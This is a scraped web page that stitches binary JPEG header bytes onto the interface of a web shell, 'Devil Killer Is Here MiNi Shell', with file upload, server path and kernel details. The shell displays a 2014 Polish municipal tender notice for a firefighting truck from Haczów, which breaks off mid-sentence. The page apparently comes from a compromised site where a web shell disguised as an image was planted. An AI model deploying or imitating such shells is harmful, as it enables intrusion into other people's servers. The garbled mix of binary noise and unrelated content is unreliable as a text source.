JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140708/228468-N-2014.html

<p class="kh_header"><b>Haczów: Dostawa samochodu ratowniczo-gaśniczego dla Ochotniczej Straży Pożarnej w Haczowie.</b><br>
<b>Numer ogłoszenia: 228468 - 2014; data zamieszczenia: 08.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.haczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa samochodu ratowniczo-gaśniczego dla Ochotniczej Straży Pożarnej w Haczowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Warunki Ogólne Samochód musi spełniać wymagania techniczno użytkowe określone w załączniku do rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu zasad bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. Nr 143, poz. 1002) wprowadzonego rozporządzeniem zmieniającym, z dnia 27.04.2010 r. (Dz. U. Nr 85, poz. 553) wraz z uszczegółowieniem tych wymogów i wyposażeniem podanym poniżej. Samochód musi spełniać wymagania techniczno-użytkowe określone w załączniku do rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu zasad bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. Nr 143, poz. 1002) wprowadzonego rozporządzeniem zmieniającym, z dnia 27.04.2010 r. (Dz. U. Nr 85, poz. 553) wraz z uszczegółowieniem tych wymogów i wyposażeniem podanym poniżej. Samochód musi spełniać przepisy Polskiej Normy PN-EN 1846-1 oraz PN-EN 1846-2. Samochód fabrycznie nowy, spełniający wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (t.j. Dz.U. z 2005 r.Nr108, poz. 908 z późn. zm.); Samochód powinien posiadać oznakowanie odblaskowe konturowe (OOK) pełne zgodne z zapisami § 12 ust. 1 pkt 17 rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003r. Nr 32 poz. 262, z późn. zm.) oraz wytycznymi regulaminu nr 48 EKG ONZ. Oznakowanie wykonane z taśmy klasy C (tzn. z materiału odblaskowego do oznakowywania konturów i pasów) o szerokości min. 50 mm oznakowanej znakiem homologacji międzynarodowej. Oznakowanie powinno znajdować się możliwie najbliżej poziomych i pionowych krawędzi samochodu. Podwozie  z  kabiną Samochód powinien być oznakowany i wyposażony w urządzenia sygnalizacyjno-ostrzegawcze, świetlne   i dźwiękowe wymagane dla uprzywilejowanego w ruchu pojazdu Państwowej Straży Pożarnej, a w szczególności: urządzenie dźwiękowe powinno umożliwiać podawanie komunikatów słownych, belka sygnalizacyjna z dwoma niebieskimi lampami LED wysyłającymi sygnał błyskowy i napisem STRAŻ, zamontowana  w wyprofilowanej nadbudowie z materiałów kompozytowych na dachu kabiny samochodu  oraz pojedyncza lampa sygnalizacyjna niebieska wysyłająca sygnał błyskowy z tyłu samochodu, dodatkowe dwie lampy sygnalizacyjne niebieskie wysyłające sygnał błyskowy z przodu samochodu. Wszystkie lampy ostrzegawcze, głośniki, lampy oświetlenia pola pracy, lampy przednie oraz tylne samochodu zabezpieczone przed uszkodzeniem mechanicznym .Samochód powinien być oznakowany i wyposażony w urządzenia sygnalizacyjno-ostrzegawcze, świetlne   i dźwiękowe wymagane dla uprzywilejowanego w ruchu pojazdu Państwowej Straży Pożarnej, a w szczególności urządzenie dźwiękowe powinno umożliwiać podawanie komunikatów słownych, belka sygnalizacyjna z dwoma niebieskimi lampami LED wysyłającymi sygnał błyskowy i napisem STRAŻ, zamontowana  w wyprofilowanej nadbudowie z materiałów kompozytowych na dachu kabiny samochodu  oraz pojedyncza lampa sygnalizacyjna niebieska wysyłająca sygnał błyskowy z tyłu samochodu, dodatkowe dwie lampy sygnalizacyjne niebieskie wysyłające sygnał błyskowy z przodu samochodu. Wszystkie lampy ostrzegawcze, głośniki, lampy oświetlenia pola pracy, lampy przednie oraz tylne samochodu zabezpieczone przed uszkodzeniem mechanicznym . Samochód musi być oznakowany numerami operacyjnymi zgodnie z zarządzeniem nr 13 Komendanta Głównego Państwowej Straży Pożarnej z dnia 27 grudnia 2012 r. zmieniającym zarządzenie w sprawie gospodarki transportowej w jednostkach organizacyjnych Państwowej Straży Pożarnej (Dz. Urz. KG PSP Nr 1, poz. 8 z późn. zm). Właściwy numer operacyjny zostanie podany w trakcie realizacji zamówienia. Maksymalna masa rzeczywista MMR samochodu gotowego do akcji ratowniczo-gaśniczej nie może przekroczyć masy całkowitej dopuszczalnej pojazdu (do 16 000 kg). Podwozie samochodu musi spełniać min następujące warunki silnik, kabina i podwozie samochodu od jednego producenta (należy podać markę i model pojazdu), silnik  o mocy min. 210 kW z zapłonem samoczynnym, silnik spełniający wymagania aktualnie obowiązujących przepisów prawa w  zakresie czystości spalin,kategoria 2 (uterenowiona),układ jezdny 4x4 - uterenowiny z:przekładnią rozdzielczą z możliwością wyboru przełożeń szosowych i terenowych,
blokadą mechanizmu różnicowego osi tylnej, przedniej oraz międzyosiowego,na osi przedniej koła pojedyncze, a na osi tylnej koła podwójne,skrzynia biegów manualna , opony uniwersalne (wielosezonowe) z bieżnikiem szosowo-terenowym,pełnowymiarowe koło zapasowe (zamawiający dopuszcza dostawę koła zapasowego luzem),układ kierowniczy samochodu ze wspomaganiem,układ hamulcowy wyposażony w ABS z możliwością odłączenia podczas jazdy w terenie, światła do jazdy dziennej uruchamiane po przekręceniu kluczyków. Zawieszenie osi przedniej: mechaniczne - resory paraboliczne, amortyzatory teleskopowe, stabilizator przechyłów, Zawiesznie  osi tylnej: mechaniczne - resory paraboliczne, amortyzatory teleskopowe, stabilizator przechyłów. Zaczep holowniczy paszczowy typ 40 wg PN 92.S 48023 z tyłu pojazdu służący do holowania przyczep, ze  złączami pneumatycznymi i elektrycznymi dwuobwodowego systemu hamulcowego, z tyłu pojazdu zamontowane gniazda elektryczne wyjściowe na 12V - 1szt., 24V- 1szt., Zaczepy holownicze z przodu i z tyłu umożliwiające odnotowanie samochodu, Szekle do mocowania lin do wyciągania samochodu. Kabina: czterodrzwiowa, jednomodułowa, 6-osobowa z układem siedzeń 1+1+4 usytuowanych przodem do kierunku jazdy. Wyposażenie kabiny: fotele kierowcy i dowódcy z regulacją odległości i pochylenia oparcia, dodatkowo fotel kierowcy amortyzowany  z regulacją wysokości, cztery fotele dla załogi siedzącej w tylnym przedziale kabiny wyposażone w uchwyty do mocowania aparatów  oddechowych (zakładanie aparatów w pozycji siedzącej) z możliwością odblokowania każdego aparatu   indywidualnie dla czterech aparatów wyszczególnionych w pkt. 1 załącznika 2, wszystkie  fotele   wyposażone   w   bezwładnościowe   pasy   bezpieczeństwa,   fotele   pokryte   materiałem  łatwozmywalnym, odpornym na rozdarcie i ścieranie,mocowanie dla 4 aparatów  oddechowych  z  konstrukcją  dźwigni  uniemożliwiającą przypadkowe odblokowanie   aparatów, np. podczas nagłego hamowania, (rodzaj aparatów podany zostanie przez zamawiającego)a) możliwość wstawienia oparć w fotelach załogi, gdy aparaty nie będą przewożone ,b)przewidzieć mocowanie dla dodatkowego aparatu oddechowego (dla dowódcy) w kabinie lub w przedziale sprzętowym, c)indywidualne oświetlenie nad fotelem dowódcy na wysięgniku giętkim, d)system ogrzewania i wentylacji niezależny od pracy silnika,e)układ klimatyzacji, f)fabryczne radio samochodowe z rozprowadzoną instalacją antenową i głośnikową g)reflektor ręczny (szperacz) do oświetlania numerów budynków zainstalowany w kabinie o mocy min.55W,  zasilany z instalacji elektrycznej samochodu, Ponadto w kabinie winno być co najmniej: zainstalowany głośnik zewnętrzny do radiotelefonu przewoźnego - głośnik od tego samego producenta,  co radiotelefon, zainstalowany wskaźnik poziomu napełnienia zbiornika wody oraz zbiornika środka pianotwórczego, umieszczona wizualna sygnalizacja otwarcia skrytek, podestów, podniesionego masztu oświetleniowego,  włączonych przystawek odbioru mocy. W kabinie kierowcy zainstalowany radiotelefon przewoźny posiadający wyświetlacz min. 14 znakowy, przystosowany do pracy na kanałach analogowych i cyfrowych (dla kanału analogowego: praca w trybie simpleks i duosimpleks, dla kanału cyfrowego modulacja szczelinowa TDMA na kanale 12,5 kHZ zgodnie z protokołem ETSI TS 102 3611,2,3), wbudowane moduły Select 5 oraz moduł GPS. Samochód wyposażony w antenę 1.4  ze sprężyną na pasmo radiowe 148 MHz umieszczoną na dachu kabiny oraz antenę dla modułu GPS. Radiotelefon zasilany oddzielną przetwornicą napięcia. Radiotelefon powinien być zaprogramowany zgodnie z dostarczoną przez Zamawiającego po podpisaniu umowy obsadą kanałową. W kabinie kierowcy 4 radiotelefony nasobne tego samego producenta co radiotelefon przewoźny z zamontowanymi na stałe ładowarkami. Radiotelefony muszą spełniać minimalne wymagania techniczno-funkcjonalne określone w załączniku nr 3 do instrukcji stanowiącej załącznik do Rozkazu Nr 4 Komendanta Głównego PSP z dnia 9 czerwca 2009 r. w sprawie wprowadzenia nowych zasad organizacji łączności w sieciach radiowych UKF Państwowej Straży Pożarnej (Dz. Urz. KG PSP Nr 1 z 2009 r. poz. 16).Komplet radiotelefonu musi zawierać: zestaw nadawczo-odbiorczy, akumulator pozbawiony efektu pamięci, mikrofonogłośnik wykonany w standardzie IP57, futerał skórzany ze szlufką do pasa. Ładowarki zasilane z instalacji elektrycznej samochodu przez przetwornicę z możliwością odłączenia wyłącznikiem ręcznym o napięciu wyjściowym zgodnym z napięciem zasilania ładowarek, zapewniające sygnalizacje cyklu pracy oraz ładowanie bez odpinania akumulatora od radiotelefonu. Wszystkie podzespoły zestawu radiotelefonu od jednego producenta. Radiotelefony winny być zaprogramowane zgodnie z dostarczoną przez Zamawiającego po podpisaniu umowy obsadą kanałową. Dodatkowo należy dostarczyć ładowarkę tzw. szybką zasilaną z sieci 230V.AC do ładowania radiotelefonów przenośnych. W kabinie kierowcy 4 latarki akumulatorowe w wykonaniu udaroodpornym, EX dla strefy 1 i 2, stopień ochrony min. IP54. Źródło światła LED o mocy min. 170 lumenów. Minimalny czas pracy Zabudowa pożarnicza. Zabudowa wykonana z materiałów stali nierdzewnej, aluminium i materiałów  kompozytowych. Wewnętrzne poszycia skrytek wykonane z anodowanej blachy aluminiowej, balustrady ochronne boczne dachu wykonane z materiałów kompozytowych. Dach zabudowy w formie platformy roboczej w wykonaniu antypoślizgowym. Na dachu pojazdu umieszczona skrzynia sprzętowa na drobny sprzęt o wymiarach w przybliżeniu 1400x460x270 mm, posiadająca oświetlenie wewnętrzne typu LED oraz uchwyty z rolkami na drabinę dwuprzęsłową z podporami ( typu ZS 2100.3H aluminiowa, uchwyty na węże ssawne, mostki przejazdowe, tłumice.   Samochód wyposażony w mocowania dla sprzętu i wyposażenia wymienionego w Załączniku  nr 2 do SIWZ. Sposób mocowania uchwytów na sprzęt wymieniony w załączniku nr 2 do SIWZ należy uzgodnić z Zamawiającym. Na dachu zamontowane działko wodno-pianowe o regulowanej wydajności min. 1600 dm3 na min przy ciśnieniu 8 bar z  prądownicą piany. Przy podstawie działka zamontowany zawór odcinający Zamawiający dopuszcza również zastosowanie zaworu odcinającego (na rurze dolotowej do działka wodno-pianowego) umieszczonego w ogrzewanym przedziale autopompy ze sterowaniem elektryczno-pneumatycznym. Działko w pozycji transportowej nie zwiększa wysokości samochodu. Drabina do wejścia na dach składana, z poręczami w górnej części ułatwiającymi w Skrytki na sprzęt i wyposażenie zamykane żaluzjami wodo i pyłoszczelnymi wspomaganymi systemem sprężynowym, i zabezpieczającym przed samoczynnym zamykaniem, wykonane z materiałów odpornych na korozję wyposażone w zamknięcie typu rurkowego lub równoważne, zamki zamykane na klucz, jeden klucz powinien pasować do wszystkich zamków. Wszystkie żaluzje powinny posiadać taśmy ułatwiające zamykanie (wszystkie taśmy zainstalowane po prawej stronie skrytki). W kabinie kierowcy powinna być zainstalowana sygnalizacja otwarcia żaluzji skrytek i odchylenia podestów roboczych. Wejście na dach, umieszczona z tyłu samochodu. Szczeble w wykonaniu antypoślizgowym. Uchwyty, klamki wszystkich urządzeń samochodu, drzwi żaluzjowych, szuflad, podestów i tac muszą być tak skonstruowane, aby możliwa była ich obsługa w rękawicach. Skrytki na sprzęt i przedział autopompy muszą być wyposażone w oświetlenie włączane automatycznie po otwarciu drzwi skrytki. Samochód wyposażony w oświetlenie pola pracy wokół samochodu zapewniające oświetlenie w warunkach słabej widoczności min. 5 luksów w odległości 1 m od pojazdu. System mocowania półek w przedziałach sprzętowych umożliwiający płynną regulację wysokości. Szuflady i wysuwane tace muszą się automatycznie blokować w pozycji zamkniętej i całkowicie otwartej oraz posiadać zabezpieczenie przed całkowitym wyciągnięciem (wypadnięcie z prowadnic). Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys samochodu muszą posiadać oznakowanie ostrzegawcze. Skrytki na sprzęt oraz przedział autopompy muszą być wyposażone w oświetlenie, główny wyłącznik oświetlenia skrytek powinien być zainstalowany w kabinie kierowcy. Ww. oświetlenie wykonane w technologii LED. Konstrukcja skrytek zapewniająca odprowadzenie wody z ich wnętrza. Samochód wyposażyć w otwierane podesty ułatwiające dostęp do sprzętu umieszczonego na wyższych półkach. Powierzchnie platform, podestów roboczych i podłogi kabiny w wykonaniu antypoślizgowym. Autopompa dwuzakresowa ze stopniem wysokiego ciśnienia o wydajność min. 3500 dm3 na min przy ciśnieniu 8 bar i min. 400 dm3 na min przy ciśnieniu 40 bar (dla wysokości ssania 1,5 m) wraz z układem wodno-pianowym wyposażonym w system sterowania umożliwiający regulację automatyczną i ręczną ciśnienia pracy, ręczny lub automatyczny dozownik środka pianotwórczego w całym zakresie pracy autopompy umożliwiające uzyskanie stężeń w zakresie od 1 do 6 procent. Autopompa zlokalizowana z tyłu pojazdu w obudowanym przedziale zamykanym drzwiami żaluzjowymi. Przystawka odbioru mocy przystosowana do długiej pracy z sygnalizacją włączenia w kabinie kierowcy. Wszystkie elementy układu wodno-pianowego muszą być odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów. Konstrukcja układu wodno-pianowego powinna umożliwiać jego całkowite odwodnienie przy użyciu możliwie najmniejszej ilości zaworów. Przedział autopompy musi być wyposażony w system ogrzewania skutecznie zabezpieczający układ wodno-pianowy przed zamarzaniem, wykonany przez tego samego producenta, co urządzenie w kabinie kierowcy. Na stanowisku obsługi autopompy zainstalowany głośnik z mikrofonem (z możliwością wyłączenia) współpracujący z radiotelefonem przewoźnym, umożliwiający prowadzenie korespondencji z przedziału autopompy. W przypadku umieszczenia w przedziale autopompy wyłącznika do uruchamiania silnika samochodu, uruchomienie silnika powinno być możliwe tylko dla neutralnego położenia dźwigni zmiany biegów. Autopompa musi umożliwiać podanie wody i wodnego roztworu środka pianotwórczego do minimum: dwóch nasad tłocznych 75 zlokalizowanych z boku lub  z tyłu samochodu, linii szybkiego natarcia, działka wodno pianowego. Autopompa musi umożliwiać podanie wody do zbiornika samochodu nasadą 110. W przedziale autopompy muszą znajdować się co najmniej następujące urządzenia kontrolno-sterownicze pracy pompy: manowakuometr, manometr niskiego ciśnienia, manometr wysokiego ciśnienia, wskaźnik poziomu wody w zbiorniku samochodu, wskaźnik poziomu środka pianotwórczego w zbiorniku, regulator prędkości obrotowej silnika pojazdu, wyłącznik silnika pojazdu, licznik motogodzin pracy autopompy, kontrolka ciśnienia oleju silnika, załączenia napędu autopompy,  wskaźnik temperatury układu chłodzenia. Dodatkowo w przedziale autopompy umieszczony schemat układu wodno-pianowego z oznaczeniem zaworów  i opisem w języku polskim. Wszystkie zawory układu wodno-pianowego muszą posiadać oznaczenia zgodne   ze schematem. W kabinie kierowcy muszą znajdować się co najmniej następujące urządzenia kontrolno-sterownicze wskaźnik poziomu wody w zbiorniku i wskaźnik poziomu środka pianotwórczego, sygnalizacja otwarcia żaluzji skrytek i podestów, sygnalizacja o wysunięciu masztu, sygnalizacja załączonego gniazda ładowania, główny wyłącznik oświetlenia skrytek, sterowanie zraszaczami, kontrolka włączenia autopompy, sterowanie niezależnym ogrzewaniem kabiny i przedziału pracy autopompy Na wlocie ssawnym autopompy musi być zamontowany element zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i dla zbiornika własnego samochodu, gwarantujący bezpieczną eksploatację autopompy. Zbiornik wody o pojemności min. 3500 dm3 wykonany z materiałów kompozytowych z układem zabezpieczającym przed wypływem wody w czasie jazdy. Zbiornik środka pianotwórczego wykonany z materiałów odpornych na działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów, o pojemności co najmniej 10 procent  pojemności zbiornika wody. Napełnianie zbiornika środkiem pianotwórczym możliwe z dachu samochodu. Samochód wyposażony w pompę elektryczną do napełniania zbiornika środka pianotwórczego z poziomu terenu,  z wężem ssącym o długości min. 1,5 mb. Samochód wyposażony instalację napełniania zbiornika wodą z hydrantu, wyposażoną w co najmniej jedną nasadę 75 z zaworem kulowym. Instalacja powinna mieć konstrukcję zabezpieczającą przez swobodnym wypływem wody ze zbiornika oraz zawór zabezpieczający przed przepełnieniem zbiornika z możliwością przełączenia na pracę ręczną. Nasada(y) winny posiadać zabezpieczenia chroniące przed dostaniem się zanieczyszczeń stałych. Samochód musi być wyposażony w co najmniej jedną wysokociśnieniową linię szybkiego natarcia o długości węża minimum 60 m na zwijadle, zakończoną prądownicą typu TURBOJET. Prądownica zainstalowana w linii szybkiego natarcia powinna posiadać płynną regulację kąta rozproszenia strumienia wodnego, oddzielną płynną regulację wydajności, funkcję przepłukiwania w czasie pracy, zawór zamknięcia-otwarcia przepływu wody. Do prądownicy dołączona nakładka umożliwiająca podanie piany. Linia szybkiego natarcia umożliwiająca podawanie wody lub piany bez względu na stopień rozwinięcia węża   z systemem automatycznego przedmuchiwania. Zwijadło wyposażone w regulowany hamulec bębna i korbę umożliwiającą zwijanie węża oraz elektryczny napęd bębna. Narożnik kończący linie zabudowy po stronie szybkiego natarcia zabezpieczony przed wycieraniem kątownikiem ze stali nierdzewnej. Pojazd wyposażony w agregat prądotwórczy o mocy min. 3 kVA, 230V, stopniu ochrony min. IP 54, połączony   z masztem oświetleniowym. Sygnalizacja podniesienia masztu w kabinie kierowcy na panelu kontrolnym. Wysuwany pneumatycznie, obrotowy maszt oświetleniowy podłączony do agregatu prądotwórczego, zabudowany na stałe w samochodzie z reflektorami LED o łącznej wielkości strumienia świetlnego 30 000 lm. (protokół  z pomiaru strumienia świetlnego przekazać Zamawiającemu w dniu odbioru pojazdu.) Wysokość min. 5 m od podłoża, na którym stoi pojazd do opraw czołowych reflektorów ustawionych poziomo, z możliwością sterowania reflektorami w pionie   i w poziomie. Stopień ochrony masztu i reflektorów min. IP 54. Głowica masztu powinna być wyposażona w podstawę stabilizującą jej położenie w pozycji transportowej. Umiejscowienie masztu nie powinno kolidować z działkiem wodno-pianowym, skrzynią sprzętową oraz drabiną. Maszt oświetleniowy wyposażony w pokrowiec ochronny. Samochód wyposażony w układ zraszaczy min. 4 dysze o wydajności 50 100 dm3 na min przy ciśnieniu 8 bar do podawania wody w czasie jazdy (podać ilość i typ zraszaczy i ich wydajność). Zamawiający wymaga, aby samochód oraz całość dostarczonego z nim wyposażenia objęte były minimum 24-miesięczną gwarancją. Zamawiający wymaga aby Wykonawca podał sieć punktów serwisowych dla obsługi pojazdu. Zamawiający wymaga, aby czas reakcji serwisu wynosił maksymalnie do 2 dni roboczych od czasu powiadomienia przez czas reakcji rozumie się dotarcie serwisu na miejsce do Użytkownika lub przemieszczenie samochodu do siedziby serwisu. Wszelkie przeglądy i naprawy objęte gwarancją przeprowadzane będą w siedzibie Użytkownika samochodu przez autoryzowany serwis na koszt Wykonawcy. W przypadku przemieszczenia pojazdu wynikające z potrzeby usunięcia stwierdzonych usterek w siedzibie Wykonawcy lub w innym miejscu, Wykonawca pokrywa koszty transportu pojazdu lub jego poszczególnych części w obydwie strony. Wykonawca obowiązany jest do dostarczenia wraz z samochodem instrukcji obsługi w języku polskim do samochodu, zabudowy pożarniczej i zainstalowanych urządzeń  i wyposażenia,  dokumentacji niezbędnej do zarejestrowania samochodu jako specjalny, wynikającej z ustawy Prawo o ruchu drogowym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 35.00.00.00-4, 35.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny  spełniania ww warunku niezbędne są:
a) Dokument potwierdzający  posiadanie  uprawnień  do  wykonywania określonej  działalności  lub czynności , jeżeli przepisy prawa nakładają  obowiązek ich  posiadania , w szczególności  koncesji  , zezwolenia  lub  licencji.  Jeżeli wykonawca  ma siedzibę  lub miejsce  zamieszkania  poza terytorium Rzeczypospolitej Polskiej , zamiast ww  dokumentu składa  dokument  lub  dokumenty   wystawione  w  kraju , w  którym  ma miejsce  zamieszkania  lub  siedzibę , potwierdzające odpowiednio, że posiada  uprawnienia do  wykonywania  działalności  związanej  z  przedmiotem  zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
 a) wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dostawy   samochodu  ratowniczo  gaśniczego  o  parametrach  zbliżonych  do pojazdu  objętego  niniejszym  postępowaniem. 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
